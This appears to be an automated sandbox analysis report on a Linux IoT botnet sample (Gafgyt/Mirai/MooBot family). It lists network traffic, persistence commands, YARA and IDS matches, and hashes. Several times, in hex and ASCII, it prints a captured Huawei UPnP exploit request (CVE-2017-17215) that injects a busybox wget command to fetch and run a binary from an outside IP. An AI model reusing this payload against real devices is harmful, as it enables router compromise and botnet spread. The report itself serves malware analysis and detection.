6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: unknown, Network traffic detected: HTTP traffic on port 43928 -> 443
            Source: unknown, Network traffic detected: HTTP traffic on port 42836 -> 443
            Source: unknown, TCP traffic detected without corresponding DNS query: [list of destination IP addresses]
            Source: lD25Z9LfKe.elf, String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: lD25Z9LfKe.elf, String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
            Source: unknown, HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
            Connection: keep-alive
            Accept: */*
            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
            Content-Length: 457
            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: unknown, DNS traffic detected: queries for: j.xnyidc.top

            System Summary

            Source: lD25Z9LfKe.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: 6224.1.00007effc4001000.00007effc4011000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: Process Memory Space: lD25Z9LfKe.elf PID: 6224, type: MEMORYSTR, Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: lD25Z9LfKe.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: 6224.1.00007effc4001000.00007effc4011000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: Process Memory Space: lD25Z9LfKe.elf PID: 6224, type: MEMORYSTR, Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: ELF static info symbol of initial sample, .symtab present: no
            Source: Initial sample, String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: Initial sample, String containing 'busybox' found: HTTP/1.1 200 OKarmarm7mipsmipselx86_64sh4ppcm68k<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
            Source: Initial sample, String containing 'busybox' found: bin/busybox
            Source: Initial sample, String containing 'busybox' found: /bin/busybox
            Source: Initial sample, String containing 'busybox' found: f%s:%dwebservbinbin/busyboxbin/watchdogbin/systemd/bin/busybox/bin/watchdog/bin/systemd
            Source: classification engine, Classification label: mal92.troj.linELF@0/0@2/0

            Persistence and Installation Behavior

            Source: /bin/sh (PID: 6231), Chmod executable with 777: /usr/bin/chmod -> chmod 777 bin/watchdog
            Source: /bin/sh (PID: 6229), Mkdir executable: /usr/bin/mkdir -> mkdir bin
            Source: /bin/sh (PID: 6231), Chmod executable: /usr/bin/chmod -> chmod 777 bin/watchdog
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234), File opened: /proc/[PID]/cmdline (repeated for each enumerated process)
            Source: /usr/bin/chmod (PID: 6231) File: /tmp/bin/watchdog (bits: - usr: rwx grp: rwx all: rwx)
            Source: /tmp/lD25Z9LfKe.elf (PID: 6226) Shell command executed: sh -c "rm -rf bin/watchdog && mkdir bin; >bin/watchdog && mv /tmp/lD25Z9LfKe.elf bin/watchdog; chmod 777 bin/watchdog"
            Source: /bin/sh (PID: 6228) Rm executable: /usr/bin/rm -> rm -rf bin/watchdog

            Hooking and other Techniques for Hiding and Protection

            Source: /tmp/lD25Z9LfKe.elf (PID: 6224) Queries kernel information via 'uname':
            Source: lD25Z9LfKe.elf, 6224.1.0000560cd0f8d000.0000560cd103d000.rw-.sdmp Binary or memory string: !/etc/qemu-binfmt/ppc11!hotpluggableq
            Source: lD25Z9LfKe.elf, 6224.1.0000560cd0f8d000.0000560cd103d000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/ppc
            Source: lD25Z9LfKe.elf, 6224.1.00007ffccda8b000.00007ffccdaac000.rw-.sdmp Binary or memory string: /usr/bin/qemu-ppc
            Source: lD25Z9LfKe.elf, 6224.1.00007ffccda8b000.00007ffccdaac000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-ppc/tmp/lD25Z9LfKe.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/lD25Z9LfKe.elf

            Stealing of Sensitive Information

            Source: Yara match File source: lD25Z9LfKe.elf, type: SAMPLE
            Source: Yara match File source: 6224.1.00007effc4001000.00007effc4011000.r-x.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: lD25Z9LfKe.elf PID: 6224, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match File source: lD25Z9LfKe.elf, type: SAMPLE
            Source: Yara match File source: 6224.1.00007effc4001000.00007effc4011000.r-x.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: lD25Z9LfKe.elf PID: 6224, type: MEMORYSTR
            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | 1 Scripting | Path Interception | Path Interception | 2 File and Directory Permissions Modification | 1 OS Credential Dumping | 11 Security Software Discovery | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Scripting | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 11 Non-Standard Port | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 1 File Deletion | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 3 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
            No configs have been found
            [Behavior graph, ID: 830684. Sample: lD25Z9LfKe.elf, Startdate: 20/03/2023, Architecture: LINUX, Score: 92. lD25Z9LfKe.elf starts sh (which starts chmod, rm, mkdir and mv) and further lD25Z9LfKe.elf processes; network nodes: j.xnyidc.top, 41.60.196.93 (realtime-asZM, Mauritius) and 99 other IPs or domains.]
            Source | Detection | Scanner | Label
            lD25Z9LfKe.elf | 61% | Virustotal |
            lD25Z9LfKe.elf | 62% | ReversingLabs | Linux.Trojan.Mirai
            No Antivirus matches

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            j.xnyidc.top | 156.224.24.249 | true | true | | unknown

            Name | Source | Malicious | Antivirus Detection | Reputation
            http://schemas.xmlsoap.org/soap/encoding/ | lD25Z9LfKe.elf | false | | high
            http://schemas.xmlsoap.org/soap/envelope/ | lD25Z9LfKe.elf | false | | high
                  No created / dropped files found
                  File type:ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
                  Entropy (8bit):6.271370241540659
                  TrID:
                  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                  File name:lD25Z9LfKe.elf
                  File size:62988
                  MD5:c929d58b6bb8f66edc985003ba50c3c1
                  SHA1:711976261f2f197a341dca8afdb7679f04aa3f99
                  SHA256:e1366976365db1f2bffdc37d4e64e12f883f9a20e02b12d52b6a1b346b8f0692
                  SHA512:3982301f57bf1e26ee56855de69eb9dce72e2ff1b3437ab9608433955c09f8c2f2e44d120daaaa7edc12e755884555dc5cfa0578f03d18233e256de9c9feb4bb
                  SSDEEP:768:qkaZjEoakZNRGHRnDmX7Xm+t/UGV8+BCpEMCi/J9KCrMvuBxANUr6FV+tMiwWfIC:MvolWm+phBgd/KCAWBxANee++bWfvF
                  TLSH:C0534B02B31C0A07D1A31AB0253F5BD197BBEAD022F4F684751F979A96B5E361182FCD

                  ELF header

                  Class:
                  Data:
                  Version:
                  Machine:
                  Version Number:
                  Type:
                  OS/ABI:
                  ABI Version:
                  Entry Point Address:
                  Flags:
                  ELF Header Size:
                  Program Header Offset:
                  Program Header Size:
                  Number of Program Headers:
                  Section Header Offset:
                  Section Header Size:
                  Number of Section Headers:
                  Header String Table Index:
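                  Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align
                   | NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | | 0 | 0 | 0
                  .init | PROGBITS | 0x10000094 | 0x94 | 0x24 | 0x0 | 0x6 | AX | 0 | 0 | 4
                  .text | PROGBITS | 0x100000b8 | 0xb8 | 0xd184 | 0x0 | 0x6 | AX | 0 | 0 | 4
                  .fini | PROGBITS | 0x1000d23c | 0xd23c | 0x20 | 0x0 | 0x6 | AX | 0 | 0 | 4
                  .rodata | PROGBITS | 0x1000d260 | 0xd260 | 0x1e10 | 0x0 | 0x2 | A | 0 | 0 | 8
                  .ctors | PROGBITS | 0x1001f074 | 0xf074 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4
                  .dtors | PROGBITS | 0x1001f07c | 0xf07c | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4
                  .data | PROGBITS | 0x1001f088 | 0xf088 | 0x314 | 0x0 | 0x3 | WA | 0 | 0 | 8
                  .sdata | PROGBITS | 0x1001f39c | 0xf39c | 0x44 | 0x0 | 0x3 | WA | 0 | 0 | 4
                  .sbss | NOBITS | 0x1001f3e0 | 0xf3e0 | 0x74 | 0x0 | 0x3 | WA | 0 | 0 | 4
                  .bss | NOBITS | 0x1001f454 | 0xf3e0 | 0x2194 | 0x0 | 0x3 | WA | 0 | 0 | 4
                  .shstrtab | STRTAB | 0x0 | 0xf3e0 | 0x4b | 0x0 | 0x0 | | 0 | 0 | 1

                  Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings
                  LOAD | 0x0 | 0x10000000 | 0x10000000 | 0xf070 | 0xf070 | 6.3212 | 0x5 | R E | 0x10000 | | .init .text .fini .rodata
                  LOAD | 0xf074 | 0x1001f074 | 0x1001f074 | 0x36c | 0x2574 | 2.8425 | 0x6 | RW | 0x10000 | | .ctors .dtors .data .sdata .sbss .bss
                  GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x6 | RW | 0x4 | |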
                  Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                  03/20/23-15:59:46.829796 | UDP | 2023883 | ET DNS Query to a *.top domain - Likely Hostile | 33891 | 53 | 192.168.2.23 | 8.8.8.8
                  03/20/23-16:00:54.853824 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 42302 | 37215 | 192.168.2.23 | 41.37.68.246
                  03/20/23-16:01:50.220586 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 57754 | 37215 | 192.168.2.23 | 192.119.137.74
                  03/20/23-16:01:45.327043 | TCP | 2030489 | ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response | 56999 | 47828 | 156.224.24.249 | 192.168.2.23
                  03/20/23-16:01:18.217927 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 45430 | 37215 | 192.168.2.23 | 197.39.222.152
                  03/20/23-16:00:44.195958 | TCP | 2030489 | ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response | 56999 | 47796 | 156.224.24.249 | 192.168.2.23
                  03/20/23-16:00:31.085625 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 35290 | 37215 | 192.168.2.23 | 197.214.98.38
                  03/20/23-16:01:09.639143 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 59180 | 37215 | 192.168.2.23 | 141.117.56.180
                  03/20/23-16:00:49.583605 | TCP | 2030490 | ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) | 47828 | 56999 | 192.168.2.23 | 156.224.24.249
                  03/20/23-16:00:17.642577 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 40848 | 37215 | 192.168.2.23 | 34.117.1.253
                  03/20/23-16:00:41.668931 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 46324 | 37215 | 192.168.2.23 | 103.167.148.132
                  03/20/23-16:00:38.463363 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 32970 | 37215 | 192.168.2.23 | 41.237.49.241
                  03/20/23-16:01:07.497528 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 38528 | 37215 | 192.168.2.23 | 41.234.87.51
                  03/20/23-16:01:35.636258 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 52042 | 37215 | 192.168.2.23 | 41.236.241.240
